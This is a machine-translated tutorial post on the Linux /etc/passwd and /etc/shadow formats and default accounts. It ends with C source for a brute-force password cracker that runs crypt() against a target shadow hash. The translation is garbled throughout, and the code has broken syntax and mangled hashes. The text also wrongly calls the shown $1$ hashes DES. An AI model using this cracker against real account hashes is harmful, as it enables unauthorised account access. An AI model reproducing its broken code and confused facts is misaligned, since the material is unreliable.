Linux Password-related (passwd/shadow) and attack methods

(The previous part is converted from the network)

In Linux, the password file is in/etc/passwd. in earlier versions, this file directly stores the encrypted password. The first two are "salt" values, which are a random number, the password is followed by an encrypted password. For security purposes, the current Linux system provides the/etc/shadow file. The password is stored in this file and is only readable by the root user.

The following is an analysis of the/etc/passwd file. Each of its entries has seven fields, namely the name: Password: User ID: Group ID: User information: Home Directory: Shell example: ynguo: x: 509: 510:/home/ynguo:/bin/bash

When the shadow file is used, the password is represented by an X, which is invisible to common users. If you take a closer look at this file, you will find some strange user names. They are the default accounts of the system, and the default accounts are common portals for attackers to intrude into the system. Therefore, you must be familiar with the default accounts, pay special attention to whether the password domain is empty. The following describes the default accounts.

ADM has an account file. The initial directory/var/adm usually contains a log file.
Bin: executable files with user commands
Daemon is used to execute the system daemprocess.
Games is used to play games.
Halt is used to execute the halt command
LP has printer background print files
Mail has mail-related processes and files
News has Usenet-related processes and files
Nobody is used by NFS (Network File System)
Shutdown
Sync to execute the sync command
Uucp has UCP tools and files

 

Traditionally, the/etc/passwd file is readable in a large range, because many applications need to use it to convert UID to user name. For example, if you cannot access/etc/passwd, the LS-l command displays uid instead of user name. However, the use of password guessing programs poses a huge security risk for readable/etc/passwd files with encrypted passwords. So the shadow file/etc/shadow appears.

The shadow password system divides the password file into two parts:/etc/passwd and/etc/shadow. The shadow password file stores the encrypted password. All the passwords in the/etc/passwd file are changed to X. Shadow can only be read by the root user, ensuring security. The format of each row of the/etc/shadow file is as follows:

Username: encrypted password: last modification time (days from January 1, January 1, 1970): minimum number of days for the password to be modified: Number of days before the password is changed: the number of days after the password is terminated: the number of days since January 1, January 1, 1970: the number of days when the account is disabled: the domain is retained.

Example: Root: $1 $ t4sfphbq $ jxgsggvkgbdd/d7fvvbbm0: 11037: 0: 99999: 7:-1:-1: 1075498172

Bin: *: 11024: 0: 99999: 7 :::
Daemon: *: 11024: 0: 99999: 7: by default, password update is disabled. If your system does not start the shadow file, run the pwconv program.

 

####################

Added by iceknife on 20100601

####################

Shadow uses DES encryption and brute-force cracking. You can use Dictionary Attacks:

For example:

Username: $1 $ jmzjgk // $ do9jjam9tqhvhkh3esytt.: 14576: 0: 99999: 7 :::
Before that, we know that the password for username is 123456. How can we get the password?

Use the crypt (char * Key, char * salt) function. Use-lcrypt link.

 

Crypt () is the password encryption function. It is based on the data
Encryption Standard algorithm with variations intended (among other
Things) to discourage use of hardware implementations of a key search.

 

Key is a user's typed password.

Salt is a two-character string chosen from the set [a-zA-Z0-9./]. This
String is used to perturb the algorithm in one of 4096 different ways.

Here key = 123456

Salt = $1 $ jmzjgk // $

The result obtained by crypt is $1 $ jmzjgk // $ do9jjam9tqhvhkh3esytt.

 

The following is the source code of a brute-force cracking attack.

/*
========================================================== ==========================================
Name: descrack. c
Author: iceknife
Version:
Copyright: Your copyright notice
Description: Hello world in C, ANSI-style
========================================================== ==========================================
*/

# Include <stdio. h>
# Include <string. h>
# Include <stdlib. h>
# Include <unistd. h>
# Include <pthread. h>

Char data [37] = "abcdefghijklmnopqrstuvwxyz0123456789 ";
Char * goalpass = "$1 $ aa133... $ gxpqgkio3cu6dncle ";
Char mypwd [10];
Int minlen = 1; // min password length
Int maxlen = 3; // max password length

 

Void subgenerate (INT index, int pwdlen)
{
If (Index = pwdlen)
Return;
Int I;
For (I = 0; I <36; I ++)
{
Mypwd [Index] = data [I];
Memset (mypwd + index + 1, data [0], pwdlen-index-1 );
If (I! = 0)
{
// Printf ("% s", mypwd );
If (! Strcmp (goalpass, crypt (mypwd, "$1 $ aa133... $ ")))
{
Printf ("find password: % s", mypwd );
Exit (0 );
}
}
Subgenerate (index + 1, pwdlen );
}
}

Void generate (INT pwdlen, int start, int end)
{
Int I;
For (I = start; I <end; I ++) // multi‑thread Segmentation
{
Mypwd [0] = data [I];
Memset (mypwd + 1, data [0], pwdlen-1); // fill Length
// Printf ("% s", mypwd );
If (! Strcmp (goalpass, crypt (mypwd, "$1 $ aa133... $ ")))
{
Printf ("find password: % s", mypwd );
Exit (0 );
}
Subgenerate (1, pwdlen );
}
}

Int main ()
{
Char mypwd [10];
If (maxlen> 9) puts ("max password length must little then 9 ");
Int I, threadnum = 10;
For (I = minlen; I <= maxlen; I ++)
{
Printf ("/npassword length: % d/N", I );
// Password length
Memset (mypwd, 0, 10 );
Generate (I,); // reserved for Multithreading
}

Puts ("password not found ");
Return 0;
}